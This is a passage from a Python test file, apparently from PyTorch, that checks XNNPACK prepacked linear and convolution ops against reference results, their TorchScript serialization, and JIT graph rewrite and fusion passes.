weight = torch.rand((weight_output_dim, input_data.shape[-1]))
if use_bias:
bias = torch.rand((weight_output_dim))
else:
bias = None
ref_result = F.linear(input_data, weight, bias)
packed_weight_bias = torch.ops.prepacked.linear_clamp_prepack(weight, bias)
output_linearprepacked = torch.ops.prepacked.linear_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
dilation,
use_bias,
format):
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0]
>= dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1]
>= dilations[1] * (kernels[1] - 1) + 1)
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
ref_result = F.conv2d(input_data, weight, bias,
strides, paddings, dilations, groups)
packed_weight_bias = torch.ops.prepacked.conv2d_clamp_prepack(weight, bias,
strides, paddings, dilations, groups)
xnnpack_result = torch.ops.prepacked.conv2d_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(1, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
output_pad_h=st.integers(0, 2),
output_pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d_transpose(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
output_pad_h,
output_pad_w,
dilation,
use_bias,
format):
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
output_paddings = (output_pad_h, output_pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0]
>= dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1]
>= dilations[1] * (kernels[1] - 1) + 1)
assume((output_pad_h < stride_h) and (output_pad_h < dilation))
assume((output_pad_w < stride_w) and (output_pad_w < dilation))
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((input_channels, output_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
# Note that groups/dilation is in reverse order from conv2d
ref_result = F.conv_transpose2d(input_data, weight, bias,
strides, paddings, output_paddings, groups, dilation)
packed_weight_bias = torch.ops.prepacked.conv2d_transpose_clamp_prepack(weight, bias,
strides, paddings,
output_paddings, dilations,
groups)
xnnpack_result = torch.ops.prepacked.conv2d_transpose_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result.contiguous(), xnnpack_result.contiguous(), rtol=1e-2, atol=1e-3)
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN fails with XNNPACK. Does not seem to have a good reason for failures.")
class TestXNNPACKSerDes(TestCase):
@given(batch_size=st.integers(0, 3),
data_shape=hu.array_shapes(1, 3, 2, 64),
weight_output_dim=st.integers(2, 64),
use_bias=st.booleans())
def test_linear(self, batch_size, data_shape, weight_output_dim, use_bias):
class Linear(torch.nn.Module):
def __init__(self, weight, bias=None):
super(Linear, self).__init__()
self.weight = weight
self.bias = bias
def forward(self, x):
return F.linear(x, self.weight, self.bias)
class LinearPrePacked(torch.nn.Module):
def __init__(self, weight, bias=None):
super(LinearPrePacked, self).__init__()
self.packed_weight_bias = torch.ops.prepacked.linear_clamp_prepack(weight, bias)
def forward(self, x):
return torch.ops.prepacked.linear_clamp_run(x, self.packed_weight_bias)
data_shape = [batch_size] + list(data_shape)
weight = torch.rand((weight_output_dim, data_shape[-1]))
if use_bias:
bias = torch.rand((weight_output_dim))
else:
bias = None
scripted_linear = torch.jit.script(Linear(weight, bias))
scripted_linear_clamp_prepacked = torch.jit.script(LinearPrePacked(weight, bias))
input_data = torch.rand(data_shape)
ref_result = scripted_linear(input_data)
output_linearprepacked = scripted_linear_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand(data_shape)
buffer = io.BytesIO()
torch.jit.save(scripted_linear, buffer)
buffer.seek(0)
deserialized_linear = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_linear_clamp_prepacked, buffer)
buffer.seek(0)
deserialized_linear_clamp_prepacked = torch.jit.load(buffer)
ref_result = deserialized_linear(input_data)
output_linearprepacked = deserialized_linear_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
dilation,
use_bias,
format):
class Conv2D(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, dilations, groups):
super(Conv2D, self).__init__()
self.weight = weight
self.bias = bias
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv2d(x, self.weight, self.bias,
self.strides, self.paddings, self.dilations, self.groups)
class Conv2DPrePacked(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, dilations, groups):
super(Conv2DPrePacked, self).__init__()
self.packed_weight_bias = torch.ops.prepacked.conv2d_clamp_prepack(weight, bias,
strides, paddings, dilations, groups)
def forward(self, x):
return torch.ops.prepacked.conv2d_clamp_run(x, self.packed_weight_bias)
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0] >=
dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1] >=
dilations[1] * (kernels[1] - 1) + 1)
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
scripted_conv2d = torch.jit.script(Conv2D(weight, bias,
strides, paddings, dilations, groups))
scripted_conv2d_clamp_prepacked = torch.jit.script(Conv2DPrePacked(
weight, bias, strides, paddings, dilations, groups))
ref_result = scripted_conv2d(input_data)
xnnpack_result = scripted_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d, buffer)
buffer.seek(0)
deserialized_conv2d = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d_clamp_prepacked, buffer)
buffer.seek(0)
deserialized_conv2d_clamp_prepacked = torch.jit.load(buffer)
ref_result = deserialized_conv2d(input_data)
xnnpack_result = deserialized_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
output_pad_h=st.integers(0, 2),
output_pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d_transpose(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
output_pad_h,
output_pad_w,
dilation,
use_bias,
format):
class Conv2DT(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, output_paddings, dilations, groups):
super(Conv2DT, self).__init__()
self.weight = weight
self.bias = bias
self.strides = strides
self.paddings = paddings
self.output_paddings = output_paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv_transpose2d(x, self.weight, self.bias,
self.strides, self.paddings, self.output_paddings, self.groups, self.dilations)
class Conv2DTPrePacked(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, output_paddings, dilations, groups):
super(Conv2DTPrePacked, self).__init__()
self.packed_weight_bias = torch.ops.prepacked.conv2d_transpose_clamp_prepack(weight, bias,
strides, paddings,
output_paddings,
dilations, groups)
def forward(self, x):
return torch.ops.prepacked.conv2d_transpose_clamp_run(x, self.packed_weight_bias)
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
output_paddings = (output_pad_h, output_pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0] >=
dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1] >=
dilations[1] * (kernels[1] - 1) + 1)
assume((output_pad_h < stride_h) and (output_pad_h < dilation))
assume((output_pad_w < stride_w) and (output_pad_w < dilation))
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((input_channels, output_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
scripted_conv2d = torch.jit.script(Conv2DT(weight, bias,
strides, paddings,
output_paddings, dilations, groups))
scripted_conv2d_clamp_prepacked = torch.jit.script(Conv2DTPrePacked(
weight, bias, strides, paddings, output_paddings, dilations, groups))
ref_result = scripted_conv2d(input_data)
xnnpack_result = scripted_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d, buffer)
buffer.seek(0)
deserialized_conv2d = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d_clamp_prepacked, buffer)
buffer.seek(0)
deserialized_conv2d_clamp_prepacked = torch.jit.load(buffer)
ref_result = deserialized_conv2d(input_data)
xnnpack_result = deserialized_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
linear_weight_output_dim=st.integers(2, 64),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_combined_model(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
dilation,
linear_weight_output_dim,
use_bias,
format):
class M(torch.nn.Module):
def __init__(self, conv_weight, conv_bias, linear_weight, linear_bias,
strides, paddings, dilations, groups):
super(M, self).__init__()
self.conv_weight = conv_weight
self.conv_bias = conv_bias
self.linear_weight = linear_weight
self.linear_bias = linear_bias
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
o = F.conv2d(x, self.conv_weight, self.conv_bias,
self.strides, self.paddings, self.dilations, self.groups)
o = o.permute([0, 2, 3, 1])
o = F.linear(o, self.linear_weight, self.linear_bias)
return F.relu(o)
class MPrePacked(torch.nn.Module):
def __init__(self, conv_weight, conv_bias, linear_weight, linear_bias,
strides, paddings, dilations, groups):
super(MPrePacked, self).__init__()
self.conv2d_clamp_run_weight_bias = \
torch.ops.prepacked.conv2d_clamp_prepack(conv_weight, conv_bias,
strides, paddings, dilations, groups)
self.linear_clamp_run_weight_bias = \
torch.ops.prepacked.linear_clamp_prepack(linear_weight, linear_bias)
def forward(self, x):
o = torch.ops.prepacked.conv2d_clamp_run(x, self.conv2d_clamp_run_weight_bias)
o = o.permute([0, 2, 3, 1])
o = torch.ops.prepacked.linear_clamp_run(o, self.linear_clamp_run_weight_bias)
return F.relu(o)
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0]
>= dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1]
>= dilations[1] * (kernels[1] - 1) + 1)
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
conv_weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
conv_bias = None
if use_bias:
conv_bias = torch.rand((output_channels))
# This is done just to find the output shape of the result
# so that the shape of weight for the following linear layer
# can be determined.
result = F.conv2d(input_data, conv_weight, conv_bias,
strides, paddings, dilations, groups)
linear_input_shape = result.shape[1]
linear_weight = torch.rand((linear_weight_output_dim, linear_input_shape))
linear_bias = None
if use_bias:
linear_bias = torch.rand((linear_weight_output_dim))
scripted_m = torch.jit.script(M(conv_weight, conv_bias, linear_weight,
linear_bias, strides, paddings, dilations, groups))
scripted_m_prepacked = torch.jit.script(
MPrePacked(
conv_weight,
conv_bias,
linear_weight,
linear_bias,
strides,
paddings,
dilations,
groups))
ref_result = scripted_m(input_data)
xnnpack_result = scripted_m_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand((batch_size, input_channels, height, width))
input_data = input_data.contiguous(memory_format=torch.channels_last)
buffer = io.BytesIO()
torch.jit.save(scripted_m, buffer)
buffer.seek(0)
deserialized_m = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_m_prepacked, buffer)
buffer.seek(0)
deserialized_m_prepacked = torch.jit.load(buffer)
ref_result = deserialized_m(input_data)
xnnpack_result = deserialized_m_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN fails with XNNPACK. Does not seem to have a good reason for failures.")
class TestXNNPACKRewritePass(TestCase):
@staticmethod
def validate_transformed_module(
# To please flake
self,
pattern_count_map,
data_shape,
prepack_removal=False,
fuse_clamping_ops=False):
input_data = torch.normal(1, 20, size=data_shape)
for jit_method in ["script", "trace"]:
module_instance = self
if jit_method == "script":
scripted_model = torch.jit.script(module_instance)
else:
scripted_model = torch.jit.trace(module_instance, input_data)
scripted_model.eval()
ref_result = scripted_model(input_data)
torch._C._jit_pass_insert_prepacked_ops(scripted_model._c)
if fuse_clamping_ops or prepack_removal:
scripted_model._c = torch._C._freeze_module(scripted_model._c)
if fuse_clamping_ops:
torch._C._jit_pass_fuse_clamp_w_prepacked_linear_conv(scripted_model._c)
if (prepack_removal):
torch._C._jit_pass_fold_prepacking_ops(scripted_model._c)
buffer = io.BytesIO()
torch.jit.save(scripted_model, buffer)
buffer.seek(0)
deserialized_scripted_model = torch.jit.load(buffer)
for pattern, v in pattern_count_map.items():
if (v == 0):
FileCheck().check(pattern).run(deserialized_scripted_model.graph)
elif (v == -1):
FileCheck().check_not(pattern).run(deserialized_scripted_model.graph)
else:
FileCheck().check_count(pattern, v, exactly=True).run(deserialized_scripted_model.graph)
xnnpack_result = deserialized_scripted_model(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
def test_linear(self):
data_shape = [2, 3, 32]
weight_output_dim = 24
weight_shape = (weight_output_dim, data_shape[-1])
class Linear(torch.nn.Module):
def __init__(self):
super(Linear, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
return F.linear(x, self.weight, self.bias)
class LinearNoBias(torch.nn.Module):
def __init__(self):
super(LinearNoBias, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
def forward(self, x):
return F.linear(x, self.weight, None)
# Linear with bias pattern.
pattern_count_map = {"Tensor = prim::CallFunction": -1,
"prepacked::linear_clamp_prepack": 1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(Linear(), pattern_count_map, data_shape)
TestXNNPACKRewritePass.validate_transformed_module(LinearNoBias(), pattern_count_map, data_shape)
# Conv params
batch_size = 2
input_channels_per_group = 6
height = 16
width = 16
output_channels_per_group = 6
groups = 4
kernel_h = kernel_w = 3
stride_h = stride_w = 1
pad_h = pad_w = 1
output_pad_h = output_pad_w = 0
dilation = 1
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
output_paddings = (output_pad_h, output_pad_w)
dilations = (dilation, dilation)
conv_weight_shape = (output_channels, input_channels_per_group, kernel_h, kernel_w)
conv_transpose_weight_shape = (input_channels, output_channels_per_group, kernel_h, kernel_w)
conv_bias_shape = (output_channels)
class Conv2D(torch.nn.Module):
def __init__(self):
super(Conv2D, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv2d(x, self.weight, self.bias,
self.strides, self.paddings, self.dilations, self.groups)
class Conv2DT(torch.nn.Module):
def __init__(self):
super(Conv2DT, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_transpose_weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.output_paddings = output_paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv_transpose2d(x, self.weight, self.bias,
self.strides, self.paddings, self.output_paddings, self.groups, self.dilations)
data_shape = (batch_size, input_channels, height, width)
pattern_count_map = {"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack": 1,
"prepacked::conv2d_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(Conv2D(), pattern_count_map, data_shape)
transpose_data_shape = (batch_size, input_channels, height, width)
transpose_pattern_count_map = {"Tensor = aten::conv_transpose2d": -1,
"prepacked::conv2d_transpose_clamp_prepack": 1,
"prepacked::conv2d_transpose_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(Conv2DT(), transpose_pattern_count_map, data_shape)
input_data = torch.rand((batch_size, input_channels, height, width))
conv_weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
conv_bias = torch.rand((output_channels))
result = F.conv2d(input_data, conv_weight, conv_bias,
strides, paddings, dilations, groups)
linear_input_shape = result.shape[1]
linear_weight_shape = (weight_output_dim, linear_input_shape)
class M(torch.nn.Module):
def __init__(self, activation_fn=F.relu):
super(M, self).__init__()
self.conv_weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.conv_bias = torch.nn.Parameter(torch.Tensor(torch.rand((conv_bias_shape))), requires_grad=False)
self.linear_weight = torch.nn.Parameter(torch.Tensor(torch.rand(linear_weight_shape)), requires_grad=False)
self.linear_bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
self.activation_fn = activation_fn
def forward(self, x):
o = F.conv2d(x, self.conv_weight, self.conv_bias,
self.strides, self.paddings, self.dilations, self.groups)
o = self.activation_fn(o)
o = o.permute([0, 2, 3, 1])
o = F.linear(o, self.linear_weight, self.linear_bias)
return self.activation_fn(o)
pattern_count_map = {"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack": 1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": 1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(M(), pattern_count_map, data_shape)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["Tensor = prim::CallFunction"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
TestXNNPACKRewritePass.validate_transformed_module(M(), pattern_count_map, data_shape, prepack_removal=True)
# Not inplace relu fusion test.
pattern_count_map = {"aten::relu": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(M(), pattern_count_map, data_shape, prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::relu"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
# Inplace relu fusion test.
pattern_count_map = {"aten::relu": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
M(F.relu_),
pattern_count_map,
data_shape,
prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::relu"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(F.relu_),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
# Not inplace hardtanh fusion test.
pattern_count_map = {"aten::hardtanh": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh),
pattern_count_map,
data_shape,
prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::hardtanh"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
# Inplace hardtanh fusion test.
pattern_count_map = {"aten::hardtanh_": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh_),
pattern_count_map,
data_shape,
prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::hardtanh_"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh_),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
class MFusionAntiPattern(torch.nn.Module):
def __init__(self):
super(MFusionAntiPattern, self).__init__()
self.linear_weight = torch.nn.Parameter(torch.Tensor(torch.rand(linear_weight_shape)), requires_grad=False)
self.linear_bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
o = F.linear(x, self.linear_weight, self.linear_bias)
o = F.relu(o)
o = F.hardtanh(o)
return o
# Unfusable hardtanh.
pattern_count_map = {"aten::hardtanh": 1, # hardtanh cannot be.
"aten::relu": -1, # relu is fused.
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
MFusionAntiPattern(),
pattern_count_map,
(16, linear_weight_shape[1]),
prepack_removal=True,
fuse_clamping_ops=True)
class MFusionAntiPatternParamMinMax(torch.nn.Module):
def __init__(self):
super(MFusionAntiPatternParamMinMax, self).__init__()
self.linear_weight = torch.nn.Parameter(torch.Tensor(torch.rand(linear_weight_shape)), requires_grad=False)
self.linear_bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
min = x[0, 0]
max = min + 10
o = F.linear(x, self.linear_weight, self.linear_bias)
o = F.hardtanh(o, min, max)
return o
# Unfusable hardtanh.
pattern_count_map = {"aten::hardtanh": 1, # hardtanh cannot be.
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
MFusionAntiPatternParamMinMax(),
pattern_count_map,
(16, linear_weight_shape[1]),
prepack_removal=True,
fuse_clamping_ops=True)
def test_decomposed_linear(self):
data_shape = [2, 32]
weight_output_dim = 24
weight_shape = (weight_output_dim, data_shape[-1])
class DecomposedLinearAddmm(torch.nn.Module):
def __init__(self):
super(DecomposedLinearAddmm, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
weight_t = self.weight.t()
return torch.addmm(self.bias, x, weight_t)
class DecomposedLinearMatmulAdd(torch.nn.Module):
def __init__(self):
super(DecomposedLinearMatmulAdd, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
weight_t = self.weight.t()
y = torch.matmul(x, weight_t)
res = y.add_(self.bias)
return res
class DecomposedLinearMatmul(torch.nn.Module):
def __init__(self):
super(DecomposedLinearMatmul, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
weight_t = self.weight.t()
res = torch.matmul(x, weight_t)
return res
# Linear with bias pattern.
pattern_count_map = {"Tensor = prim::CallFunction": -1,
"prepacked::linear_clamp_prepack": 1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(DecomposedLinearAddmm(), pattern_count_map, data_shape)
TestXNNPACKRewritePass.validate_transformed_module(DecomposedLinearMatmulAdd(), pattern_count_map, data_shape)
TestXNNPACKRewritePass.validate_transformed_module(DecomposedLinearMatmul(), pattern_count_map, data_shape)
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN is not fork-safe since we're forking in a multi-threaded environment")
class TestXNNPACKConv1dTransformPass(TestCase):
@staticmethod
def validate_transform_conv1d_to_conv2d(
self,
pattern_count_transformed_map,
pattern_count_optimized_map,
data_shape):
input_data = torch.normal(1, 20, size=data_shape)
for jit_method in ["script", "trace"]:
module_instance = self
if jit_method == "script":
scripted_model = torch.jit.script(module_instance)
else:
